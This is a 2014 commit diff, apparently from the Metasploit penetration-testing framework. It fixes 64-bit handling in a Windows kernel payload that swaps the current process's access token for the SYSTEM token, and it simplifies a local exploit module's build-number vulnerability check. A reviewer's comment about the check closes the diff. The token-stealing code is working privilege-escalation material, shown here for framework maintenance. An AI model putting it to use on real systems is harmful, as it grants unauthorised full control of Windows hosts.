Fix the 64 bits code

bug/bundler_fix
jvazquez-r7 2014-10-30 17:01:59 -05:00
parent 03a84a1de3
commit 6574db5dbb
4 changed files with 10 additions and 11 deletions


@ -38,7 +38,7 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
OUT PVOID Process
);
typedef NTSTATUS(NTAPI *lPsReferencePrimaryToken)(
typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
_Inout_ PVOID Process
);
@ -137,7 +137,7 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
// Search the specified data structure for a member with CurrentValue.
BOOL FindAndReplaceMember(PDWORD Structure,
BOOL find_and_replace_member(PDWORD Structure,
DWORD CurrentValue,
DWORD NewValue,
DWORD MaxSize)
@ -146,8 +146,11 @@ BOOL FindAndReplaceMember(PDWORD Structure,
// Microsoft QWORD aligns object pointers, then uses the lower three
// bits for quick reference counting.
#ifdef _M_X64
Mask = ~0xf;
#else
Mask = ~7;
#endif
// Mask out the reference count.
CurrentValue &= Mask;
@ -174,11 +177,11 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
TargetToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pMyProcessInfo);
SystemToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pSystemInfo);
TargetToken = pPsReferencePrimaryToken(pMyProcessInfo);
SystemToken = pPsReferencePrimaryToken(pSystemInfo);
// Find the token in the target process, and replace with the system token.
FindAndReplaceMember((PDWORD)pMyProcessInfo,
find_and_replace_member((PDWORD)pMyProcessInfo,
(DWORD)TargetToken,
(DWORD)SystemToken,
0x200);


@ -94,11 +94,7 @@ class Metasploit3 < Msf::Exploit::Local
return Exploit::CheckCode::Safe if build == 9200
return Exploit::CheckCode::Safe if build == 9600
if arch == ARCH_X86
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
else
return Exploit::CheckCode::Detected if build == 7601
end
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
return Exploit::CheckCode::Unknown
end
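Review bot: With the architecture branch removed, the check returns `Detected` from the build number alone on every architecture, and nothing visible in this hunk looks at the installed patch level, so a fully updated host on one of these builds would presumably still be reported. A comment above the list should say so, for example `# Build number only; does not verify whether the vendor fix is installed.` The bare build numbers would also be easier to audit with release names beside them (2600 is Windows XP, 3790 is Server 2003, 7600/7601 are Windows 7 / Server 2008 R2 RTM and SP1, 9200 and 9600 are Windows 8 and 8.1). The check method begins outside this hunk.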